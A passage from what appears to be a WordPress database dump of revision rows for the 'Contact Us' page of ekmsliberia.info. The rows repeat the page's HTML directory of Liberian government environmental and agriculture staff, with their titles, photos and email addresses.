src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:25:32','2021-03-29 09:25:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3641,42,'2021-03-29 09:39:39','2021-03-29 09:39:39','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:39:39','2021-03-29 09:39:39','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3642,42,'2021-03-29 09:39:39','2021-03-29 09:39:39','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img 